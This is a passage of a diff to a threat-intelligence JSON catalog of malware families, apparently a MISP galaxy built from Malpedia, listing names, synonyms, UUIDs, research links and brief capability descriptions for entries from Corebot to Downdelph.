"http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" + ] + }, + "uuid": "495377c4-1be5-4c65-ba66-94c221061415", + "value": "Corebot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://malware.prevenity.com/2014/08/malware-info.html", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" + ] + }, + "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", + "value": "Coreshell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", + "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" + ] + }, + "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", + "value": "CradleCore", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "CrashOverride", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", + "value": "Credraptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" + ] + }, + "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", + "value": "Crenufs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", + "value": "Crimson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" + ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", + "https://hackmag.com/security/ransomware-russian-style/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", + "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", + "https://twitter.com/demonslay335/status/971164798376468481" + ] + }, + "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", + "value": "Cryakl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" + ] + }, + "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", + "value": "CryLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", + "value": "CrypMic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", + "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" + ] + }, + "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", + "value": "Crypt0l0cker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://www.secureworks.com/research/cryptolocker-ransomware", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" + ] + }, + "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", + "value": "CryptoLocker", + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", + "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" + ] + }, + "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", + "value": "CryptoLuck", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptFile2" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", + "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", + "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" + ] + }, + "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", + "value": "CryptoMix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", + "https://twitter.com/struppigel/status/810770490491043840" + ] + }, + "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", + "value": "Cryptorium", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", + "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", + "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" + ] + }, + "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", + "value": "CryptoShield", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", + "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" + ] + }, + "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", + "value": "CryptoShuffler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + ] + }, + "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", + "value": "Cryptowall", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", + "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" + ] + }, + "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", + "value": "CryptoWire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", + "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", + "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", + "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" + ] + }, + "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", + "value": "CryptoFortress", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", + "https://twitter.com/JaromirHorejsi/status/818369717371027456" + ] + }, + "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", + "value": "CryptoRansomeware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", + "value": "CryptXXXX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", + "value": "CsExt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Windshield?" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" + ] + }, + "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", + "value": "Cuegoe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", + "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" + ] + }, + "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", + "value": "Cueisfry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + ] + }, + "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", + "value": "Cutlet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + ] + }, + "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", + "value": "Cutwail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rebhip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ] + }, + "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", + "value": "CyberGate", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" + ] + }, + "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", + "value": "CyberSplitter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", + "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" + ] + }, + "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", + "value": "CycBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", + "value": "Dairy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", + "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + ] + }, + "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", + "value": "DanaBot", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " + }, + { + "meta": { + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://darkcomet.net", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", + "value": "DarkComet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", + "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", + "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" + ] + }, + "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", + "value": "DarkMegi", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chymine" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", + "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" + ] + }, + "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", + "value": "Darkmoon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" + ] + }, + "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", + "value": "DarkPulsar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", + "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" + ] + }, + "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", + "value": "DarkShell", + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", + "https://blog.radware.com/security/2018/02/darksky-botnet/", + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://github.com/ims0rry/DarkSky-botnet" + ] + }, + "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", + "value": "Darksky", + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", + "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" + ] + }, + "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", + "value": "DarkStRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", + "https://securelist.com/dark-tequila-anejo/87528/" + ] + }, + "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", + "value": "DarkTequila", + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", + "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", + "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" + ] + }, + "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", + "value": "Darktrack RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", + "value": "Daserf", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" + ] + }, + "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", + "value": "Datper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", + "value": "DDKONG", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", + "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", + "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" + ] + }, + "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", + "value": "Decebal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", + "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" + ] + }, + "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", + "value": "Delta(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" + ] + }, + "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", + "value": "Dented", + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", + "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + ] + }, + "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", + "value": "DeputyDog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", + "https://twitter.com/struppigel/status/812601286088597505" + ] + }, + "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", + "value": "DeriaLock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + ] + }, + "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", + "value": "Derusbi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" + ] + }, + "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", + "value": "Devil's Rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "LusyPOS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" + ] + }, + "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", + "value": "Dexter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", + "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", + "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" + ] + }, + "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", + "value": "DE Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crysis", + "Arena" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ] + }, + "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", + "value": "Dharma", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", + "https://www.scmagazine.com/inside-diamondfox/article/578478/", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", + "https://blog.cylance.com/a-study-in-bots-diamondfox" + ] + }, + "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", + "value": "DiamondFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" + ] + }, + "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", + "value": "Dimnie", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", + "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", + "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" + ] + }, + "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", + "value": "DirCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" + ] + }, + "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", + "value": "DistTrack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" + ] + }, + "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", + "value": "DMA Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", + "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" + ] + }, + "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", + "value": "DNSMessenger", + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + }, + { + "meta": { + "synonyms": [ + "Shelma" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", + "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" + ] + }, + "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", + "value": "DogHousePower", + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", + "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" + ] + }, + "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", + "value": "NgrBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", + "value": "Dorshel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", + "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" + ] + }, + "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", + "value": "DoublePulsar", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DELPHACY" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + ] + }, + "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", + "value": "Downdelph", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 